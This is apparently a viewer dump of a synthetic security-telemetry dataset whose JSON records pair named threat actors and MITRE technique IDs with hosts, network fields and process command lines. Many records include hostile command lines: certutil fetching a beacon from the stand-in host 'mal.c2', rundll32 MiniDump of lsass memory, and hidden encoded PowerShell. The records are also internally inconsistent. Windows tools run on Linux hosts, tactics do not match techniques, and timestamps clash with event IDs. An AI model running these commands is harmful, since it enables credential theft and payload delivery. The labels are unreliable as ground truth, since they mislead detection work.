text stringlengths 1.13k 1.33k |
|---|
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Command and Control","Collection","Persistence"],"technique_id":"T1021.006"},"event_id":"evt_volttyphoon_20250521T145555000Z_0017801","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.40.2.38","name":"AZURE-VM-Z2LVLOG7EN","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17801Volt TyphoonT1021.006"},"network":{"domain":"github.com","dst_ip":"1.47.172.10","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"wmic.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-02-08T01:00:11.000Z","user":{"name":"azuread\\43kifm8tdj4u","sid":"S-1-5-21-695677466-456527157-3849"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Exfiltration","Impact","Credential Access"],"technique_id":"T1546.003"},"event_id":"evt_lapsus_20260609T090004000Z_0017803","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.127.92.189","name":"WIN-FIN-SRV-5GIPNCIHD3","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17803Lapsus$T1546.003"},"network":{"domain":"github.com","dst_ip":"1.39.175.55","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-06-30T08:09:54.000Z","user":{"name":"azuread\\vhkdj3g5c3x4","sid":"S-1-5-21-851544348-776859657-1057"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Reconnaissance","Command and Control","Privilege Escalation"],"technique_id":"T1021.006"},"event_id":"evt_scatteredspider_20260726T050840000Z_0017805","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.218.127.142","name":"APP-WEB-GYVTEQPWPO","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17805Scattered SpiderT1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.172.160.249","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2026-04-16T08:57:50.000Z","user":{"name":"arn:aws:iam::b0uk4wtq66fe","sid":"S-1-5-21-489194404-971561931-1899"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Credential Access","Discovery"],"technique_id":"T1059.001"},"event_id":"evt_fin7_20260422T105923000Z_0017807","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["TLS","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.118.7.90","name":"EC2-INST-8LN5HXQEUV","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17807FIN7T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.25.79.197","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2171 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-02-02T11:48:59.000Z","user":{"name":"arn:aws:iam::ekxhm3g66gau","sid":"S-1-5-21-571116323-592233615-3363"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Initial Access"],"technique_id":"T1531"},"event_id":"evt_unc4841_20260811T231449000Z_0017809","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.235.132.198","name":"DB-ORACLE-ZWE2HRTKQE","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17809UNC4841T1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.105.58.52","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 586 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-04-08T11:25:18.000Z","user":{"name":"i-se8is9ku3nyp","sid":"S-1-5-21-698825048-266336343-2746"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Discovery","Credential Access"],"technique_id":"T1003.001"},"event_id":"evt_lapsus_20250319T222748000Z_0017811","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.40.60.102","name":"WIN-FIN-SRV-T32WKDLXAT","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17811Lapsus$T1003.001"},"network":{"domain":"github.com","dst_ip":"1.144.127.120","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-12-12T06:04:29.000Z","user":{"name":"svc_mo4zf9nafj0a","sid":"S-1-5-21-952024571-562524434-8981"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Defense Evasion","Reconnaissance","Discovery"],"technique_id":"T1003.001"},"event_id":"evt_lapsus_20261003T102323000Z_0017813","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.17.111.253","name":"EC2-INST-FKA6OQCPG6","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17813Lapsus$T1003.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.67.218.232","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-07-24T21:42:11.000Z","user":{"name":"svc_arv7h1qrjgsm","sid":"S-1-5-21-930883989-424035491-6672"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Collection"],"technique_id":"T1071.001"},"event_id":"evt_unc4841_20250812T122518000Z_0017815","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["WMI","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.223.250.225","name":"WIN-FIN-SRV-5PLV3KP2CX","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17815UNC4841T1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.44.71.169","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-06-12T22:15:34.000Z","user":{"name":"CORP\\oajuzl32pv2y","sid":"S-1-5-21-231965382-284200328-6010"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Credential Access","Defense Evasion","Privilege Escalation"],"technique_id":"T1021.006"},"event_id":"evt_apt41_20250906T124548000Z_0017817","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.155.21.69","name":"IAM-ROLE-IOAWBUS4UI","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17817APT41T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.174.192.8","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-11-18T12:59:42.000Z","user":{"name":"svc_a0z93rbzrkcl","sid":"S-1-5-21-863694859-937898698-6860"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Persistence","Impact"],"technique_id":"T1570"},"event_id":"evt_unc4841_20260118T202611000Z_0017819","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.154.180.218","name":"DB-ORACLE-O547YMM5YH","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17819UNC4841T1570"},"network":{"domain":"github.com","dst_ip":"1.101.65.3","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2179 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-05-06T18:42:41.000Z","user":{"name":"svc_2ra4qa79w4x3","sid":"S-1-5-21-482546102-163609101-8265"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Exfiltration"],"technique_id":"T1003.001"},"event_id":"evt_volttyphoon_20260223T204313000Z_0017821","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.47.14.115","name":"EC2-INST-7M8TF8GDJW","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17821Volt TyphoonT1003.001"},"network":{"domain":"github.com","dst_ip":"1.96.150.41","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-12-24T02:34:10.000Z","user":{"name":"i-9gf7lg1zn0g6","sid":"S-1-5-21-535669480-959241083-8276"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Defense Evasion","Lateral Movement"],"technique_id":"T1098.004"},"event_id":"evt_scatteredspider_20251027T211711000Z_0017823","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.38.10.231","name":"AZURE-VM-NU3NF3GZAO","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17823Scattered SpiderT1098.004"},"network":{"domain":"github.com","dst_ip":"1.140.127.61","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1458 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-12-14T02:11:49.000Z","user":{"name":"CORP\\uyhf01poxcmz","sid":"S-1-5-21-375482204-739569193-1490"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Collection","Impact"],"technique_id":"T1003.001"},"event_id":"evt_scatteredspider_20250923T113046000Z_0017825","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.171.83.254","name":"DB-ORACLE-YWPRT9B7C1","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17825Scattered SpiderT1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.30.31.64","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-07-18T15:13:43.000Z","user":{"name":"arn:aws:iam::rbmen5qgnfht","sid":"S-1-5-21-593069295-911959222-8440"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Persistence","Discovery","Execution"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20261124T075104000Z_0017827","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["WMI","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.67.33.251","name":"AZURE-VM-QT3H17DWTQ","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17827Lapsus$T1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.171.111.207","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-03-21T19:00:42.000Z","user":{"name":"azuread\\r0hqul28xohd","sid":"S-1-5-21-587126438-791128810-4312"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Discovery"],"technique_id":"T1071.001"},"event_id":"evt_lapsus_20250608T030306000Z_0017829","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["WMI","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.72.227.90","name":"AZURE-VM-3MDFYAEM79","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17829Lapsus$T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.130.231.148","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-11-13T20:05:59.000Z","user":{"name":"i-axd3tb01133t","sid":"S-1-5-21-657242275-353630667-9500"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Initial Access","Credential Access","Collection"],"technique_id":"T1003.001"},"event_id":"evt_apt41_20250321T005304000Z_0017831","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.71.123.102","name":"WIN-FIN-SRV-H10O3SECUV","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17831APT41T1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.152.39.147","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 990 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-10-14T21:54:17.000Z","user":{"name":"CORP\\tkzd425lyvx2","sid":"S-1-5-21-523377614-299370242-1511"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Persistence","Discovery"],"technique_id":"T1098.004"},"event_id":"evt_scatteredspider_20251102T225336000Z_0017833","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.32.159.8","name":"AZURE-VM-RKCRXF23Q4","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17833Scattered SpiderT1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.120.132.247","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2186 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-02-26T00:23:46.000Z","user":{"name":"CORP\\hatbtvrn0333","sid":"S-1-5-21-549561209-993540520-1746"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Lateral Movement","Initial Access"],"technique_id":"T1546.003"},"event_id":"evt_apt29_20261113T055542000Z_0017835","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.32.145.123","name":"IAM-ROLE-P5TFUMY8VV","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17835APT29T1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.72.128.249","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"powershell.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-11-23T15:04:46.000Z","user":{"name":"i-fm6ea6zbck2v","sid":"S-1-5-21-549340916-914463023-5077"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Execution","Lateral Movement","Credential Access"],"technique_id":"T1570"},"event_id":"evt_apt29_20250822T040102000Z_0017837","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.141.98.64","name":"EC2-INST-V6416S8KFC","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17837APT29T1570"},"network":{"domain":"github.com","dst_ip":"1.129.51.105","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-11-27T13:00:22.000Z","user":{"name":"i-2fqphofdspvy","sid":"S-1-5-21-213638072-242589948-2232"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Defense Evasion","Execution"],"technique_id":"T1059.001"},"event_id":"evt_apt41_20251221T183256000Z_0017839","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.163.11.157","name":"AZURE-VM-EXF6XB0N40","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17839APT41T1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.67.254.162","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-12-10T08:08:30.000Z","user":{"name":"CORP\\z6hn50a8id79","sid":"S-1-5-21-495952300-192931298-7422"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Privilege Escalation","Discovery"],"technique_id":"T1003.001"},"event_id":"evt_unc4841_20250416T182819000Z_0017841","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.255.197.164","name":"DB-ORACLE-SL3AOFUENN","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17841UNC4841T1003.001"},"network":{"domain":"github.com","dst_ip":"1.22.101.197","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-10-19T12:02:47.000Z","user":{"name":"azuread\\1h215f257n9b","sid":"S-1-5-21-438484398-730558717-7092"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Execution","Persistence","Collection"],"technique_id":"T1021.006"},"event_id":"evt_mustangpanda_20250523T173820000Z_0017843","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.65.32.157","name":"WIN-FIN-SRV-WDAH2V5S6U","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17843Mustang PandaT1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.52.96.33","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-04-19T15:42:30.000Z","user":{"name":"svc_qdx7a2zz5q1y","sid":"S-1-5-21-131155888-424209207-8418"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Lateral Movement","Privilege Escalation"],"technique_id":"T1546.003"},"event_id":"evt_mustangpanda_20250117T110019000Z_0017845","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.107.227.185","name":"EC2-INST-8WK7KF7KQH","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17845Mustang PandaT1546.003"},"network":{"domain":"github.com","dst_ip":"1.115.214.208","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-01-25T17:03:10.000Z","user":{"name":"i-9ps7ntc0ak7c","sid":"S-1-5-21-565452963-529247684-6348"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Collection","Command and Control","Privilege Escalation"],"technique_id":"T1546.003"},"event_id":"evt_volttyphoon_20250928T235602000Z_0017847","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.77.183.177","name":"WIN-FIN-SRV-JHI53MOILS","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17847Volt TyphoonT1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.73.233.243","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin 